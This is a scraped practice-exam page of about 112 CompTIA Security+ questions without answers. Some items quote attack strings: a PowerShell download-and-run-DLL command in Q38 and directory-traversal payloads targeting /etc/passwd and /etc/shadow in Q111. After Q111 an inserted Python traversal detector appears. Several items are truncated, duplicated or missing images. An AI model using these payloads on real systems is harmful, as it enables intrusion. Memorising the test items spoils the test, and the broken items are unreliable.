
CompTIA SY0-601 Dumps

Page: 1 / 61
Total 607 questions

CompTIA Security+ Exam 2023 Questions and Answers

Question 1

An email security vendor recently added a retroactive alert after discovering a phishing email had already been delivered to an inbox. Which of the following would be the best way for the security administrator to address this type of alert in the future?

Options:

A.

Utilize a SOAR playbook to remove the phishing message.

B.

Manually remove the phishing emails when alerts arrive.

C.

Delay all emails until the retroactive alerts are received.

D.

Ingest the alerts into a SIEM to correlate with delivered messages.

Question 2

Given the following snippet of Python code:

[image not reproduced here]

Which of the following types of malware MOST likely contains this snippet?

Options:

A.

Logic bomb

B.

Keylogger

C.

Backdoor

D.

Ransomware

Question 3

An organization wants to quickly assess how effectively the IT team hardened new laptops. Which of the following would be the best solution to perform this assessment?

Options:

A.

Install a SIEM tool and properly configure it to read the OS configuration files.

B.

Load current baselines into the existing vulnerability scanner.

C.

Maintain a risk register with each security control marked as compliant or non-compliant.

D.

Manually review the secure configuration guide checklists.

Question 4

Which of the following can be used by an authentication application to validate a user's credentials without the need to store the actual sensitive data? 

Options:

A.

Salt string

B.

Private Key

C.

Password hash

D.

Cipher stream

Question 5

The application development team is in the final stages of developing a new healthcare application. The team has requested copies of current PHI records to perform the final testing.

Which of the following would be the best way to safeguard this information without impeding the testing process?

Options:

A.

Implementing a content filter

B.

Anonymizing the data

C.

Deploying DLP tools

D.

Installing a FIM on the application server

Question 6

A security architect is designing the new outbound internet for a small company. The company would like all 50 users to share the same single Internet connection. In addition, users will not be permitted to use social media sites or external email services while at work. Which of the following should be included in this design to satisfy these requirements? (Select TWO).

Options:

A.

DLP

B.

MAC filtering

C.

NAT

D.

VPN

E.

Content filter

F.

WAF

Question 7

An IT manager is estimating the mobile device budget for the upcoming year. Over the last five years, the number of devices that were replaced due to loss, damage, or theft steadily increased by 10%. Which of the following would best describe the estimated number of devices to be replaced next year?

Options:

A.

SLA

B.

ARO

C.

RPO

D.

SLE

Question 8

Which of the following is a solution that can be used to stop a disgruntled employee from copying confidential data to a USB drive?

Options:

A.

DLP

B.

TLS

C.

AV

D.

IDS

Question 9

An organization needs to implement more stringent controls over administrator/root credentials and service accounts. Requirements for the project include:

* Check-in/checkout of credentials

* The ability to use but not know the password

* Automated password changes

* Logging of access to credentials

Which of the following solutions would meet the requirements?

Options:

A.

OAuth 2.0

B.

Secure Enclave

C.

A privileged access management system

D.

An OpenID Connect authentication system

Question 10

A security architect is working on an email solution that will send sensitive data. However, funds are not currently available in the budget for building additional infrastructure. Which of the following should the architect choose?

Options:

A.

POP

B.

IPSec

C.

IMAP

D.

PGP

Question 11

A company policy requires third-party suppliers to self-report data breaches within a specific time frame. Which of the following third-party risk management policies is the company complying with?

Options:

A.

MOU

B.

SLA

C.

EOL

D.

NDA

Question 12

A security analyst received the following requirements for the deployment of a security camera solution:

* The cameras must be viewable by the on-site security guards.

* The cameras must be able to communicate with the video storage server.

* The cameras must have the time synchronized automatically.

* The cameras must not be reachable directly via the internet.

* The servers for the cameras and video storage must be available for remote maintenance via the company VPN.

Which of the following should the security analyst recommend to securely meet the remote connectivity requirements?

Options:

A.

Creating firewall rules that prevent outgoing traffic from the subnet the servers and cameras reside on

B.

Deploying a jump server that is accessible via the internal network that can communicate with the servers

C.

Disabling all unused ports on the switch that the cameras are plugged into and enabling MAC filtering

D.

Implementing a WAF to allow traffic from the local NTP server to the camera server

Question 13

Which of the following would a security analyst use to determine if other companies in the same sector have seen similar malicious activity against their systems?

Options:

A.

Vulnerability scanner

B.

Open-source intelligence

C.

Packet capture

D.

Threat feeds

Question 14

Physical access to the organization's servers in the data center requires entry and exit through multiple access points: a lobby, an access control vestibule, three doors leading to the server floor itself and eventually to a caged area solely for the organization's hardware. Which of the following controls is described in this scenario?

Options:

A.

Compensating

B.

Deterrent

C.

Preventive

D.

Detective

Question 15

While researching a data exfiltration event, the security team discovers that a large amount of data was transferred to a file storage site on the internet. Which of the following controls would work best to reduce the risk of further exfiltration using this method?

Options:

A.

Data loss prevention

B.

Blocking IP traffic at the firewall

C.

Containerization

D.

File integrity monitoring

Question 16

A security administrator installed a new web server. The administrator did this to increase the capacity for an application due to resource exhaustion on another server. Which of the following algorithms should the administrator use to split the number of connections on each server in half?

Options:

A.

Weighted response

B.

Round-robin

C.

Least connection

D.

Weighted least connection

Question 17

A corporate security team needs to secure the wireless perimeter of its physical facilities to ensure only authorized users can access corporate resources. Which of the following should the security team do?

Options:

A.

Identify rogue access points.

B.

Check for channel overlaps.

C.

Create heat maps.

D.

Implement domain hijacking.

Question 18

A security administrator needs to block a TCP connection using the corporate firewall. Because this connection is potentially a threat, the administrator does not want to send back an RST. Which of the following actions in a rule would work best?

Options:

A.

Drop

B.

Reject

C.

Log alert

D.

Permit

Question 19

A global pandemic is forcing a private organization to close some business units and reduce staffing at others. Which of the following would be best to help the organization's executives determine their next course of action?

Options:

A.

An incident response plan

B.

A communication plan

C.

A disaster recovery plan

D.

A business continuity plan

Question 20

A company recently enhanced mobile device configuration by implementing a set of security controls: biometrics, context-aware authentication, and full device encryption. Even with these settings in place, an unattended phone was used by a malicious actor to access corporate data.

Which of the following additional controls should be put in place first?

Options:

A.

GPS tagging

B.

Remote wipe

C.

Screen lock timer

D.

SEAndroid

Question 21

Which of the following measures the average time that equipment will operate before it breaks?

Options:

A.

SLE

B.

MTBF

C.

RTO

D.

ARO

Question 22

A company would like to protect credit card information that is stored in a database from being exposed and reused. However, the current POS system does not support encryption. Which of the following would be BEST suited to secure this information?

Options:

A.

Masking

B.

Tokenization

C.

DLP

D.

SSL/TLS

Question 23

A security analyst is investigating a report from a penetration test. During the penetration test, consultants were able to download sensitive data from a back-end server. The back-end server was exposing an API that should have only been available from the company’s mobile application. After reviewing the back-end server logs, the security analyst finds the following entries:

[image not reproduced here]

Which of the following is the most likely cause of the security control bypass?

Options:

A.

IP address allow list

B.

User-agent spoofing

C.

WAF bypass

D.

Referrer manipulation

Question 24

A company needs to enhance its ability to maintain a scalable cloud infrastructure. The infrastructure needs to handle the unpredictable loads on the company's web application. Which of the following cloud concepts would BEST meet these requirements?

Options:

A.

SaaS

B.

VDI

C.

Containers

D.

Microservices

Question 25

A company is moving its retail website to a public cloud provider. The company wants to tokenize credit card data but not allow the cloud provider to see the stored credit card information. Which of the following would BEST meet these objectives?

Options:

A.

WAF

B.

CASB

C.

VPN

D.

TLS

Question 26

Which of the following best describes when an organization utilizes a ready-to-use application from a cloud provider?

Options:

A.

IaaS

B.

SaaS

C.

PaaS

D.

XaaS

Question 27

Which of the following should a Chief Information Security Officer consider using to take advantage of industry standard guidelines?

Options:

A.

SSAE SOC 2

B.

GDPR

C.

PCI DSS

D.

NIST CSF

Question 28

An air traffic controller receives a change in flight plan for an incoming aircraft over the phone. The air traffic controller compares the change to what appears on radar and determines the information to be false. As a result, the air traffic controller is able to prevent an incident from occurring. Which of the following is this scenario an example of?

Options:

A.

Mobile hijacking

B.

Vishing

C.

Unsecure VoIP protocols

D.

SPIM attack

Question 29

A company is developing a new initiative to reduce insider threats. Which of the following should the company focus on to make the greatest impact?

Options:

A.

Social media analysis

B.

Least privilege

C.

Nondisclosure agreements

D.

Mandatory vacation

Question 30

An attacker is targeting a company. The attacker notices that the company’s employees frequently access a particular website. The attacker decides to infect the website with malware and hopes the employees’ devices will also become infected. Which of the following techniques is the attacker using?

Options:

A.

Watering-hole attack

B.

Pretexting

C.

Typosquatting

D.

Impersonation

Question 31

Which of the following can be used to detect a hacker who is stealing company data over port 80?

Options:

A.

Web application scan

B.

Threat intelligence

C.

Log aggregation

D.

Packet capture

Question 32

A security practitioner is performing due diligence on a vendor that is being considered for cloud services. Which of the following should the practitioner consult for the best insight into the current security posture of the vendor?

Options:

A.

PCI DSS standards

B.

SLA contract

C.

CSF framework

D.

SOC 2 report

Question 33

Security analysts have noticed the network becomes flooded with malicious packets at specific times of the day. Which of the following should the analysts use to investigate this issue?

Options:

A.

Web metadata

B.

Bandwidth monitors

C.

System files

D.

Correlation dashboards

Question 34

A network-connected magnetic resonance imaging (MRI) scanner at a hospital is controlled and operated by an outdated and unsupported specialized Windows OS. Which of the following is most likely preventing the IT manager at the hospital from upgrading the specialized OS?

Options:

A.

The time needed for the MRI vendor to upgrade the system would negatively impact patients.

B.

The MRI vendor does not support newer versions of the OS.

C.

Changing the OS breaches a support SLA with the MRI vendor.

D.

The IT team does not have the budget required to upgrade the MRI scanner.

Question 35

After installing a patch on a security appliance, an organization realized a massive data exfiltration occurred. Which of the following describes the incident?

Options:

A.

Supply chain attack

B.

Ransomware attack

C.

Cryptographic attack

D.

Password attack

Question 36

An organization has been experiencing outages during holiday sales and needs to ensure availability of its point-of-sales systems. The IT administrator has been asked to improve both server-data fault tolerance and site availability under high consumer load. Which of the following are the best options to accomplish this objective? (Select two.)

Options:

A.

Load balancing

B.

Incremental backups

C.

UPS

D.

RAID

E.

Dual power supply

F.

VLAN

Question 37

An organization's Chief Information Security Officer is creating a position that will be responsible for implementing technical controls to protect data, including ensuring backups are properly maintained. Which of the following roles would MOST likely include these responsibilities?

Options:

A.

Data protection officer

B.

Data owner

C.

Backup administrator

D.

Data custodian

E.

Internal auditor

Question 38

An employee received an email with an unusual file attachment named Updates.lnk. A security analyst reverse engineers what the file does and finds that it executes the following script:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -URI -OutFile $env:TEMP\autoupdate.dll;Start-Process rundll32.exe $env:TEMP\autoupdate.dll

Which of the following BEST describes what the analyst found?

Options:

A.

A Powershell code is performing a DLL injection.

B.

A PowerShell code is displaying a picture.

C.

A PowerShell code is configuring environmental variables.

D.

A PowerShell code is changing Windows Update settings.

Question 39

A security analyst is investigating a report from a penetration test. During the penetration test, consultants were able to download sensitive data from a back-end server. The back-end server was exposing an API that should have only been available from the company's mobile application. After reviewing the back-end server logs, the security analyst finds the following entries:

[image not reproduced here]

Which of the following is the most likely cause of the security control bypass?

Options:

A.

IP address allow list

B.

User-agent spoofing

C.

WAF bypass

D.

Referrer manipulation

Question 40

A company is enhancing the security of the wireless network and needs to ensure only employees with a valid certificate can authenticate to the network. Which of the following should the company implement?

Options:

A.

PEAP

B.

PSK

C.

WPA3

D.

WPS

Question 41

A security analyst is reviewing packet capture data from a compromised host. In the packet capture, the analyst locates packets that contain large amounts of text. Which of the following is most likely installed on the compromised host?

Options:

A.

Keylogger

B.

Spyware

C.

Trojan

D.

Ransomware

Question 42

Unauthorized devices have been detected on the internal network. The devices' locations were traced to Ethernet ports located in conference rooms. Which of the following would be the best technical controls to implement to prevent these devices from accessing the internal network?

Options:

A.

NAC

B.

DLP

C.

IDS

D.

MFA

Question 43

A security administrator performs weekly vulnerability scans on all cloud assets and provides a detailed report. Which of the following describes the administrator's activities?

Options:

A.

Continuous deployment

B.

Continuous integration

C.

Continuous validation

D.

Continuous monitoring

Question 44

A company is launching a website in a different country in order to capture user information that a marketing business can use. The company itself will not be using the information. Which of the following roles is the company assuming?

Options:

A.

Data owner

B.

Data processor

C.

Data steward

D.

Data collector

Question 45

A company is switching to a remote work model for all employees. All company and employee resources will be in the cloud. Employees must use their personal computers to access the cloud computing environment. The company will manage the operating system. Which of the following deployment models is the company implementing?

Options:

A.

CYOD

B.

MDM

C.

COPE

D.

VDI

Question 46

The help desk has received calls from users in multiple locations who are unable to access core network services. The network team has identified and turned off the network switches using remote commands. Which of the following actions should the network team take NEXT?

Options:

A.

Disconnect all external network connections from the firewall

B.

Send response teams to the network switch locations to perform updates

C.

Turn on all the network switches by using the centralized management software

D.

Initiate the organization's incident response plan.

Question 47

Which of the following function as preventive, detective, and deterrent controls to reduce the risk of physical theft? (Select TWO).

Options:

A.

Mantraps

B.

Security guards

C.

Video surveillance

D.

Fences

E.

Bollards

F.

Antivirus

Question 48

A third party asked a user to share a public key for secure communication. Which of the following file formats should the user choose to share the key?

Options:

A.

.pfx

B.

.csr

C.

.pvk

D.

.cer

Question 49

As part of the building process for a web application, the compliance team requires that all PKI certificates are rotated annually and can only contain wildcards at the secondary subdomain level. Which of the following certificate properties will meet these requirements?

Options:

A.

HTTPS://.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022

B.

HTTPS://app1.comptia.org, Valid from April 10 00:00:00 2021-April 8 12:00:00 2022

C.

HTTPS:// app1.comptia.org, Valid from April 10 00:00:00 2021-April 8 12:00:00 2022

D.

HTTPS://.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00

Question 50

A company wants to modify its current backup strategy to minimize the number of backups that would need to be restored in case of data loss. Which of the following would be the BEST backup strategy?

Options:

A.

Incremental backups followed by differential backups

B.

Full backups followed by incremental backups

C.

Delta backups followed by differential backups

D.

Incremental backups followed by delta backups

E.

Full backup followed by differential backups

Question 51

The Chief Information Security Officer wants to pilot a new adaptive, user-based authentication method. The concept includes granting logical access based on physical location and proximity. Which of the following is the BEST solution for the pilot?

Options:

A.

Geofencing

B.

Self-sovereign identification

C.

PKI certificates

D.

SSO

Question 52

A security administrator is setting up a SIEM to help monitor for notable events across the enterprise. Which of the following control types does this BEST represent?

Options:

A.

Preventive

B.

Compensating

C.

Corrective

D.

Detective

Question 53

Which of the following BEST describes a social-engineering attack that relies on an executive at a small business visiting a fake banking website where credit card and account details are harvested?

Options:

A.

Whaling

B.

Spam

C.

Invoice scam

D.

Pharming

Question 54

A security administrator has discovered that workstations on the LAN are becoming infected with malware. The cause of the infections appears to be users receiving phishing emails that are bypassing the current email-filtering technology. As a result, users are being tricked into clicking on malicious URLs, as no internal controls currently exist in the environment to evaluate their safety. Which of the following would be BEST to implement to address the issue?

Options:

A.

Forward proxy

B.

HIDS

C.

Awareness training

D.

A jump server

E.

IPS

Question 55

A security engineer is reviewing the logs from a SAML application that is configured to use MFA. During this review, the engineer notices a high volume of successful logins that did not require MFA from users who were traveling internationally. The application, which can be accessed without a VPN, has a policy that allows time-based tokens to be generated. Users who changed locations should be required to reauthenticate but have been. Which of the following statements BEST explains the issue?

Options:

A.

OpenID is mandatory to make the MFA requirements work

B.

An incorrect browser has been detected by the SAML application

C.

The access device has a trusted certificate installed that is overwriting the session token

D.

The user's IP address is changing between logins, but the application is not invalidating the token

Question 56

A security engineer is hardening existing solutions to reduce application vulnerabilities. Which of the following solutions should the engineer implement FIRST? (Select TWO)

Options:

A.

Auto-update

B.

HTTP headers

C.

Secure cookies

D.

Third-party updates

E.

Full disk encryption

F.

Sandboxing

G.

Hardware encryption

Question 57

A company is required to continue using legacy software to support a critical service. Which of the following BEST explains a risk of this practice?

Options:

A.

Default system configuration

B.

Unsecure protocols

C.

Lack of vendor support

D.

Weak encryption

Question 58

As part of the lessons-learned phase, the SOC is tasked with building methods to detect if a previous incident is happening again. Which of the following would allow the security analyst to alert the SOC if an event is reoccurring?

Options:

A.

Creating a playbook within the SOAR

B.

Implementing rules in the NGFW

C.

Updating the DLP hash database

D.

Publishing a new CRL with revoked certificates

Question 59

Which of the following cryptographic concepts would a security engineer utilize while implementing non-repudiation? (Select TWO)

Options:

A.

Block cipher

B.

Hashing

C.

Private key

D.

Perfect forward secrecy

E.

Salting

F.

Symmetric keys

Question 60

An analyst is working on an email security incident in which the target opened an attachment containing a worm. The analyst wants to implement mitigation techniques to prevent further spread. Which of the following is the BEST course of action for the analyst to take?

Options:

A.

Apply a DLP solution.

B.

Implement network segmentation

C.

Utilize email content filtering.

D.

Isolate the infected attachment.

Question 61

During a forensic investigation, a security analyst discovered that the following command was run on a compromised host:

[image not reproduced here]

Which of the following attacks occurred?

Options:

A.

Buffer overflow

B.

Pass the hash

C.

SQL injection

D.

Replay attack

Question 62

A junior security analyst is reviewing web server logs and identifies the following pattern in the log file:

[image not reproduced here]

Which of the following types of attacks is being attempted and how can it be mitigated?

Options:

A.

XSS; implement a SIEM

B.

CSRF; implement an IPS

C.

Directory traversal; implement a WAF

D.

SQL injection; implement an IDS

Question 63

Which of the following are the MOST likely vectors for the unauthorized inclusion of vulnerable code in a software company’s final software releases? (Select TWO.)

Options:

A.

Unsecure protocols

B.

Use of penetration-testing utilities

C.

Weak passwords

D.

Included third-party libraries

E.

Vendors/supply chain

F.

Outdated anti-malware software

Question 64

An enterprise needs to keep cryptographic keys in a safe manner. Which of the following network appliances can achieve this goal?

Options:

A.

HSM

B.

CASB

C.

TPM

D.

DLP

Question 65

A large enterprise has moved all its data to the cloud behind strong authentication and encryption. A sales director recently had a laptop stolen, and later, enterprise data was found to have been compromised from a local database. Which of the following was the MOST likely cause?

Options:

A.

Shadow IT

B.

Credential stuffing

C.

SQL injection

D.

Man in the browser

E.

Bluejacking

Question 66

A security engineer needs to build a solution to satisfy regulatory requirements that state certain critical servers must be accessed using MFA. However, the critical servers are older and are unable to support the addition of MFA. Which of the following will the engineer MOST likely use to achieve this objective?

Options:

A.

A forward proxy

B.

A stateful firewall

C.

A jump server

D.

A port tap

Question 67

Which of the following in a forensic investigation should be priorities based on the order of volatility? (Select TWO).

Options:

A.

Page files

B.

Event logs

C.

RAM

D.

Cache

E.

Stored files

F.

HDD

Question 68

The spread of misinformation surrounding the outbreak of a novel virus on election day led to eligible voters choosing not to take the risk of going to the polls. This is an example of:

Options:

A.

prepending.

B.

an influence campaign.

C.

a watering-hole attack.

D.

intimidation.

E.

information elicitation.

Question 69

Ann, a customer, received a notification from her mortgage company stating her PII may be shared with partners, affiliates, and associates to maintain day-to-day business operations.

Which of the following documents did Ann receive?

Options:

A.

An annual privacy notice

B.

A non-disclosure agreement

C.

A privileged-user agreement

D.

A memorandum of understanding

Question 70

After a phishing scam for a user's credentials, the red team was able to craft a payload to deploy on a server. The attack allowed the installation of malicious software that initiates a new remote session.

Which of the following types of attacks has occurred?

Options:

A.

Privilege escalation

B.

Session replay

C.

Application programming interface

D.

Directory traversal

Question 71

A global company is experiencing unauthorized logins due to credential theft and account lockouts caused by brute-force attacks. The company is considering implementing a third-party identity provider to help mitigate these attacks. Which of the following would be the BEST control for the company to require from prospective vendors?

Options:

A.

IP restrictions

B.

Multifactor authentication

C.

A banned password list

D.

A complex password policy

Question 72

The Chief Information Security Officer has directed the security and networking team to retire the use of shared passwords on routers and switches. Which of the following choices BEST meets the requirements?

Options:

A.

SAML

B.

TACACS+

C.

Password vaults

D.

OAuth

Question 73

The SIEM at an organization has detected suspicious traffic coming from a workstation in its internal network. An analyst in the SOC investigates the workstation and discovers that malware associated with a botnet is installed on the device. A review of the logs on the workstation reveals that the privileges of the local account were escalated to a local administrator. To which of the following groups should the analyst report this real-world event?

Options:

A.

The NOC team

B.

The vulnerability management team

C.

The CIRT

D.

The red team

Question 74

A security analyst is responding to an alert from the SIEM. The alert states that malware was discovered on a host and was not automatically deleted. Which of the following would be BEST for the analyst to perform?

Options:

A.

Add a deny-all rule to that host in the network ACL.

B.

Implement a network-wide scan for other instances of the malware.

C.

Quarantine the host from other parts of the network.

D.

Revoke the client's network access certificates.

Question 75

A security engineer needs to create a network segment that can be used for servers that require connections from untrusted networks. Which of the following should the engineer implement?

Options:

A.

An air gap

B.

A hot site

C.

A VLAN

D.

A screened subnet

Question 76

Which of the following involves the inclusion of code in the main codebase as soon as it is written?

Options:

A.

Continuous monitoring

B.

Continuous deployment

C.

Continuous Validation

D.

Continuous integration

Question 77

Which of the following provides a catalog of security and privacy controls related to the United States federal information systems?

Options:

A.

GDPR

B.

PCI DSS

C.

ISO 27000

D.

NIST 800-53

Question 78

A major clothing company recently lost a large amount of proprietary information. The security officer must find a solution to ensure this never happens again.

Which of the following is the BEST technical implementation to prevent this from happening again?

Options:

A.

Configure DLP solutions

B.

Disable peer-to-peer sharing

C.

Enable role-based

D.

Mandate job rotation

E.

Implement content filters

Question 79

The Chief Technology Officer of a local college would like visitors to utilize the school's WiFi but must be able to associate potential malicious activity to a specific person. Which of the following would BEST allow this objective to be met?

Options:

A.

Requiring all new, on-site visitors to configure their devices to use WPS

B.

Implementing a new SSID for every event hosted by the college that has visitors

C.

Creating a unique PSK for every visitor when they arrive at the reception area

D.

Deploying a captive portal to capture visitors' MAC addresses and names

Question 80

A security researcher is tracking an adversary by noting its attacks and techniques based on its capabilities, infrastructure, and victims. Which of the following is the researcher MOST likely using?

Options:

A.

The Diamond Model of Intrusion Analysis

B.

The Cyber Kill Chain

C.

The MITRE CVE database

D.

The incident response process

Question 81

As part of a company's ongoing SOC maturation process, the company wants to implement a method to share cyberthreat intelligence data with outside security partners. Which of the following will the company MOST likely implement?

Options:

A.

TAXII

B.

TLP

C.

TTP

D.

STIX

Question 82

A Chief Information Officer receives an email stating a database will be encrypted within 24 hours unless a payment of $20,000 is credited to the account mentioned in the email. This BEST describes a scenario related to:

Options:

A.

whaling.

B.

smishing.

C.

spear phishing

D.

vishing

Question 83

While reviewing pcap data, a network security analyst is able to locate plaintext usernames and passwords being sent from workstations to network switches. Which of the following is the security analyst MOST likely observing?

Options:

A.

SNMP traps

B.

A Telnet session

C.

An SSH connection

D.

SFTP traffic

Question 84

Which of the following would MOST likely be identified by a credentialed scan but would be missed by an uncredentialed scan?

Options:

A.

Vulnerabilities with a CVSS score greater than 6.9.

B.

Critical infrastructure vulnerabilities on non-IP protocols.

C.

CVEs related to non-Microsoft systems such as printers and switches.

D.

Missing patches for third-party software on Windows workstations and servers.

Question 85

Which of the following would produce the closest experience of responding to an actual incident response scenario?

Options:

A.

Lessons learned

B.

Simulation

C.

Walk-through

D.

Tabletop

Question 86

An organization wants seamless authentication to its applications. Which of the following should the organization employ to meet this requirement?

Options:

A.

SOAP

B.

SAML

C.

SSO

D.

Kerberos

Question 87

The following are the logs of a successful attack.


Which of the following controls would be BEST to use to prevent such a breach in the future?

Options:

A.

Password history

B.

Account expiration

C.

Password complexity

D.

Account lockout

Question 88

A security researcher has alerted an organization that its sensitive user data was found for sale on a website. Which of the following should the organization use to inform the affected parties?

Options:

A.

An incident response plan

B.

A communications plan

C.

A business continuity plan

D.

A disaster recovery plan

Question 89

Which of the following incident response steps occurs before containment?

Options:

A.

Eradication

B.

Recovery

C.

Lessons learned

D.

Identification

Question 90

A security administrator wants to implement a program that tests a user's ability to recognize attacks over the organization's email system. Which of the following would be BEST suited for this task?

Options:

A.

Social media analysis

B.

Annual information security training

C.

Gamification

D.

Phishing campaign

Question 91

A company uses specially configured workstations for any work that requires administrator privileges to its Tier 0 and Tier 1 systems. The company follows a strict process to harden systems immediately upon delivery. Even with these strict security measures in place, an incident occurred from one of the workstations. The root cause appears to be that the SoC was tampered with or replaced. Which of the following most likely occurred?

Options:

A.

Fileless malware

B.

A downgrade attack

C.

A supply-chain attack

D.

A logic bomb

E.

Misconfigured BIOS

Question 92

The manager who is responsible for a data set has asked a security engineer to apply encryption to the data on a hard disk. The security engineer is an example of a:

Options:

A.

data controller

B.

data owner.

C.

data custodian.

D.

data processor

Question 93

Which of the following components can be used to consolidate and forward inbound internet traffic to multiple cloud environments through a single firewall?

Options:

A.

Transit gateway

B.

Cloud hot site

C.

Edge computing

D.

DNS sinkhole

Question 94

An organization suffered numerous multiday power outages at its current location. The Chief Executive Officer wants to create a disaster recovery strategy to resolve this issue. Which of the following options offer low-cost solutions? (Select two).

Options:

A.

Warm site

B.

Generator

C.

Hot site

D.

Cold site

E.

Cloud backups

F.

UPS

Question 95

A security analyst is reviewing the output of a web server log and notices a particular account is attempting to transfer large amounts of money:

GET 6959 &amount=500000 HTTP/1.1

GET &amount=5000000 HTTP/1.1

GET &amount=1000000 HTTP/1.1

GET &amount=500 HTTP/1.1

Which of the following types of attacks is most likely being conducted?

Options:

A.

SQLi

B.

CSRF

C.

Spear phishing

D.

API

Question 96

A systems administrator set up an automated process that checks for vulnerabilities across the entire environment every morning. Which of the following activities is the systems administrator conducting?

Options:

A.

Scanning

B.

Alerting

C.

Reporting

D.

Archiving

Question 97

A large industrial system's smart generator monitors the system status and sends alerts to third-party maintenance personnel when critical failures occur. While reviewing the network logs, the company's security manager notices the generator's IP is sending packets to an internal file server's IP. Which of the following mitigations would be best for the security manager to implement while maintaining alerting capabilities?

Options:

A.

Segmentation

B.

Firewall allow list

C.

Containment

D.

Isolation

Question 98

An organization is having difficulty correlating events from its individual AV, EDR, DLP, SWG, WAF, MDM, HIPS, and CASB systems. Which of the following is the best way to improve the situation?

Options:

A.

Remove expensive systems that generate few alerts.

B.

Modify the systems to alert only on critical issues.

C.

Utilize a SIEM to centralize logs and dashboards.

D.

Implement a new syslog/NetFlow appliance.

Question 99

A company recently experienced a data breach and the source was determined to be an executive who was charging a phone in a public area. Which of the following would most likely have prevented this breach?

Options:

A.

A firewall

B.

A device pin

C.

A USB data blocker

D.

Biometrics

Question 100

An organization's Chief Security Officer (CSO) wants to validate the business's involvement in the incident response plan to ensure its validity and thoroughness. Which of the following will the CSO most likely use?

Options:

A.

An external security assessment

B.

A bug bounty program

C.

A tabletop exercise

D.

A red-team engagement

Question 101

A security analyst has been tasked with ensuring all programs that are deployed into the enterprise have been assessed in a runtime environment. Any critical issues found in the program must be sent back to the developer for verification and remediation. Which of the following best describes the type of assessment taking place?

Options:

A.

Input validation

B.

Dynamic code analysis

C.

Fuzzing

D.

Manual code review

Question 102

A company is adding a clause to its AUP that states employees are not allowed to modify the operating system on mobile devices. Which of the following vulnerabilities is the organization addressing?

Options:

A.

Cross-site scripting

B.

Buffer overflow

C.

Jailbreaking

D.

Side loading

Question 103

Which of the following agreements defines response time, escalation points, and performance metrics?

Options:

A.

BPA

B.

MOA

C.

NDA

D.

SLA

Question 104

A security analyst is investigating a malware incident at a company. The malware is accessing a command-and-control website at . All outbound internet traffic is logged to a syslog server and stored in /logfiles/messages. Which of the following commands would be best for the analyst to use on the syslog server to search for recent traffic to the command-and-control website?

Options:

A.

head -500 www.comptia.com | grep /logfiles/messages

B.

cat /logfiles/messages | tail -500 www.comptia.com

C.

tail -500 /logfiles/messages | grep www.comptia.com

D.

grep -500 /logfiles/messages | cat www.comptia.com

Question 105

Which of the following holds staff accountable while escorting unauthorized personnel?

Options:

A.

Locks

B.

Badges

C.

Cameras

D.

Visitor logs

Question 106

An organization is outlining data stewardship roles and responsibilities. Which of the following employee roles would determine the purpose of data and how to process it?

Options:

A.

Data custodian

B.

Data controller

C.

Data protection officer

D.

Data processor

Question 107

A vulnerability has been discovered and a known patch to address the vulnerability does not exist. Which of the following controls works best until a proper fix is released?

Options:

A.

Detective

B.

Compensating

C.

Deterrent

D.

Corrective

Question 108

The Chief Executive Officer (CEO) of an organization would like staff members to have the flexibility to work from home anytime during business hours, including during a pandemic or crisis. However, the CEO is concerned that some staff members may take advantage of the flexibility and work from high-risk countries while on holiday or outsource work to a third-party organization in another country. The Chief Information Officer believes the company can implement some basic controls to mitigate the majority of the risk. Which of the following would be best to mitigate the CEO's concerns? (Select two).

Options:

A.

Geolocation

B.

Time-of-day restrictions

C.

Certificates

D.

Tokens

E.

Geotagging

F.

Role-based access controls

Question 109

A Chief Information Security Officer (CISO) wants to explicitly raise awareness about the increase of ransomware-as-a-service in a report to the management team. Which of the following best describes the threat actor in the CISO's report?

Options:

A.

Insider threat

B.

Hacktivist

C.

Nation-state

D.

Organized crime

Question 110

A security analyst is creating baselines for the server team to follow when hardening new devices for deployment. Which of the following best describes what the analyst is creating?

Options:

A.

Change management procedure

B.

Information security policy

C.

Cybersecurity framework

D.

Secure configuration guide

Question 111

A security analyst is reviewing SIEM logs during an ongoing attack and notices the following:

php?f=/etc/passwd

..%2F..%2F..%2Fetc%2Fshadow

http://company.com/../../../../etc/passwd

Which of the following best describes the type of attack?

Options:

A.

SQLi

B.

CSRF

C.

API attacks

D.

Directory traversal
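The three entries above are the classic signatures of path traversal: a request that names /etc/passwd outright, a URL-encoded parent-directory sequence (%2F is the encoded form of /), and a raw ../../ chain. As an added example, not part of the original exam material, the following Python detection logic decodes each request target repeatedly so that double-encoded payloads such as ..%252F are normalised as well, then checks for parent-directory segments and well-known sensitive files. The sample request lines are constructed for the example and only loosely modelled on the SIEM entries above.

```python
import re
from urllib.parse import unquote

# Constructed sample request lines (assumed, not the page's own SIEM entries):
# the first three mirror the patterns in Question 111, the fourth is double-encoded.
SAMPLE_REQUESTS = [
    "GET /view.php?f=/etc/passwd HTTP/1.1",
    "GET /download?file=..%2F..%2F..%2Fetc%2Fshadow HTTP/1.1",
    "GET http://company.com/../../../../etc/passwd HTTP/1.1",
    "GET /download?file=..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1",
    "GET /images/logo.png HTTP/1.1",
    "GET /download?file=report-2023.pdf HTTP/1.1",
]

# A parent-directory segment: ".." bounded by slashes/backslashes or string ends.
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
# Files an attacker reaches for once traversal works.
SENSITIVE_FILES = ("/etc/passwd", "/etc/shadow", "boot.ini", "win.ini")


def fully_decode(target: str, max_rounds: int = 3) -> str:
    """Percent-decode until the string stops changing, so that
    double-encoded payloads (%252F -> %2F -> /) are normalised too."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def is_traversal(request_line: str) -> bool:
    """True if the request target contains a '..' segment or names a sensitive file."""
    parts = request_line.split(" ", 2)
    if len(parts) != 3:
        return False  # not a well-formed request line
    decoded = fully_decode(parts[1]).replace("\\", "/")
    if TRAVERSAL_RE.search(decoded):
        return True
    return any(name in decoded for name in SENSITIVE_FILES)


def flag_requests(lines):
    """Return the subset of request lines that look like directory traversal."""
    return [line for line in lines if is_traversal(line)]


if __name__ == "__main__":
    for line in flag_requests(SAMPLE_REQUESTS):
        print("TRAVERSAL:", line)
```

The repeated decoding matters in practice: a WAF or SIEM rule that decodes only once sees ..%2F after the first pass and lets the double-encoded request through.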

Question 112

A security analyst receives a SIEM alert that someone logged in to the app admin test account, which is only used for the early detection of attacks. The security analyst then reviews the following application log:


Which of the following can the security analyst conclude?

Options:

A.

